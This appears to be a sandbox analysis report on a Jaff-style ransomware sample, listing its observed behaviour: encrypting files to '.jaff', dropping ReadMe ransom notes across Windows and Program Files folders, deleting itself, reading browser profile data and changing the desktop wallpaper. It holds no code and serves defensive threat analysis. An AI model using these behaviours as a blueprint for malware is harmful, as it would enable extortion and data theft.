File opened for modification C:\Windows\SysWOW64\drivers\ReadMe.bmp.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ReadMe.html.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Indicator Removal: File Deletion

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\EnterpriseE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\fr-FR\ReadMe.bmp.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\Ultimate\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\UltimateN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\Ultimate\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnts002.inf_amd64_neutral_ad2aa922aa11af2c\Amd64\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnts003.inf_amd64_neutral_33a68664c7e7ae4b\Amd64\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\UltimateN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\SysWOW64\migwiz\PostMigRes\Web\base_images\ReadMe.html.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\SysWOW64\license.rtf.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\UltimateE\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\EnterpriseE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnky309.inf_amd64_ja-jp_afbb421e3dc1cb6b\Amd64\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\Enterprise\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\HomeBasicE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\eval\HomeBasicN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\WCN\es-ES\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\_Default\HomePremiumE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\ProfessionalE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\Ultimate\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\Professional\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\migwiz\PostMigRes\Web\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\HomeBasicE\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\UltimateE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\EnterpriseN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\EnterpriseN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\EnterpriseN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnrc00c.inf_amd64_neutral_53a58f4fd7d88575\Amd64\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\HomeBasic\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\HomePremium\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnrc00c.inf_amd64_neutral_53a58f4fd7d88575\Amd64\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\HomePremiumE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnkm003.inf_amd64_neutral_48652cda3bb15180\Amd64\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\_Default\ProfessionalN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\ProfessionalN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\ProfessionalN\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\HomePremium\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\WCN\es-ES\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiabr00a.inf_amd64_neutral_6033065925bcc882\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\HomeBasicN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\OEM\UltimateN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HomePremiumN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\LogFiles\SQM\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\_Default\ProfessionalN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\UltimateN\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\UltimateN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\ProfessionalE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\OEM\Enterprise\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\OEM\StarterE\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\HomePremiumE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\EnterpriseN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Ultimate\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\eval\Ultimate\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\OEM\Professional\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\Professional\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\HomeBasicN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Enterprise\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HomePremium\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\Ultimate\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\System32\catroot2\edb006C9.log.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\System32\catroot2\edb006D2.log.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\StarterE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\eval\Ultimate\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Rondo\\WallpapeR.bmp" C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\css\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PAPYRUS\THMBNAIL.PNG.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\TAB_OFF.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewFrame.html.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CONCRETE\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RESUME.XML.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115841.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\PREVIEW.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\css\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\PublicFunctions.js.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityLetter.Dotx.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15019_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR13F.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\en-US\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14655_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\SNEEZE.WAV.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\include\win32\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL075.XML.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\PrivateBrowsing_150.png.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR24F.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BREEZE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\db\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lij.txt.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\VisualElements\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\PREVIEW.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\COMPUTER.ICO.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03014_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
